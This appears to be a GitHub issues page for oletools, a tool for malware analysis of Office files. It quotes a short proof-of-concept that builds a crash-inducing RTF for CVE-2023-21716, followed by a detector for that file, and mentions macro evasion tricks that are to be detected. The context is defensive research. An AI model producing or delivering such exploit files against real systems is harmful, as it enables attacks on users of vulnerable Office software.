oletools
oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
All oletools unit tests pass with pyparsing 3.0.9 installed. This makes it easier to use oletools as a library.
_extract_xlm_plugin_biff adds xlm_macro even if no Excel 4.0 macro sheet exists
Processing the same file went from 50s to 7s.
See https://twitter.com/SI_FalconTeam/status/1633114934253965314 (YARA rule)
Another YARA rule: https://github.com/AmgdGocha/Detection-Rules/blob/main/CVE-2023-21716.yar
PoC: https://twitter.com/jduck/status/1632471544935923712
```python
# PoC: writes an RTF whose \fonttbl group holds 32761 {\fN ...;} font entries
open("t3zt.rtf", "wb").write((
    "{\\rtf1{\n{\\fonttbl"
    + "".join("{\\f%dA;}\n" % i for i in range(0, 32761))
    + "}\n{\\rtlch no crash??}\n}}\n"
).encode("utf-8"))
```
See also https://github.com/gyaansastra/CVE-2023-21716
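As an added example (not code from the oletools project or from the issue above): a minimal check that isolates the `{\fonttbl ...}` group of an RTF file by matching braces and counts the `{\fN` font entries inside it, flagging files whose count reaches the number the PoC writes. The threshold of 32761 is an assumption taken from the PoC itself, not from the CVE description; the `make_rtf` helper builds constructed samples with the same layout as the PoC so the check can be run offline.

```python
import re
from typing import Optional

# Assumption: the PoC above writes 32761 font entries, so that count is used as
# the alert threshold here. Real documents declare at most a few dozen fonts.
SUSPICIOUS_FONT_COUNT = 32761

# {\f followed by digits: a font definition such as {\f0A;} or {\f12 Arial;}
FONT_ENTRY = re.compile(rb"\{\\f(\d+)")

BACKSLASH, OPEN, CLOSE = b"\\{}"


def extract_fonttbl(rtf: bytes) -> Optional[bytes]:
    """Return the raw bytes of the {\\fonttbl ...} group, or None if absent.

    Walks the group brace by brace; a backslash escapes the next byte, so
    \\{ and \\} (literal braces) and control words such as \\fonttbl do not
    disturb the depth count.
    """
    start = rtf.find(b"{\\fonttbl")
    if start == -1:
        return None
    depth = 0
    i = start
    while i < len(rtf):
        c = rtf[i]
        if c == BACKSLASH:
            i += 2  # skip the escaped byte
            continue
        if c == OPEN:
            depth += 1
        elif c == CLOSE:
            depth -= 1
            if depth == 0:
                return rtf[start:i + 1]
        i += 1
    return rtf[start:]  # unterminated group: treat the rest of the file as the table


def count_fonts(rtf: bytes) -> int:
    """Number of {\\fN ...;} entries declared inside the font table only."""
    tbl = extract_fonttbl(rtf)
    if tbl is None:
        return 0
    return len(FONT_ENTRY.findall(tbl))


def is_suspicious(rtf: bytes) -> bool:
    """True when the font table is as large as the PoC's (assumed threshold)."""
    return count_fonts(rtf) >= SUSPICIOUS_FONT_COUNT


def make_rtf(n_fonts: int) -> bytes:
    """Constructed sample with the PoC's layout: n_fonts entries in the font
    table, followed by a body group that references a font (must not be counted)."""
    fonttbl = b"".join(b"{\\f%dA;}\n" % i for i in range(n_fonts))
    return b"{\\rtf1{\n{\\fonttbl" + fonttbl + b"}\n{\\f0 body text}\n}}\n"


if __name__ == "__main__":
    for n in (3, SUSPICIOUS_FONT_COUNT):
        sample = make_rtf(n)
        print(n, count_fonts(sample), is_suspicious(sample))
```

Because only the `\fonttbl` group is scanned, `\fN` references in the document body do not inflate the count; a file that declares no font table at all scores zero. A production check would additionally want to look at the largest font ID rather than only the entry count, but that goes beyond what the PoC on this page shows.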
Hello. I checked DDE in some malware .doc samples and found a malware doc that contained DDE but was not detected by msodde. I did a little research and...
Hi, is it possible to sanitize vbaProject.bin (remove pCode) via oletools? I'm not interested in dumping the pCode but only in removing it completely in a way that Office reports...
**Affected tool:** olevba **Describe the bug** olevba does not extract the macro in the office file correctly. Although the macro works correctly, olevba seems to be broken because it incorrectly...
check all the keywords mentioned in https://www.countercept.com/blog/dechaining-macros-and-evading-edr
See https://inquest.net/blog/2022/10/03/hiding-xml for an example of VBA macro using CustomXML to store a payload. Also a new keyword `ActiveDocument.CustomXMLParts` to be added: https://learn.microsoft.com/en-us/office/vba/api/Office.CustomXMLParts
This is a summary of single-commit branches I gathered over the years. Each commit explains itself. This is not for merging as-is but rather for cherry-picking individual commits. If that...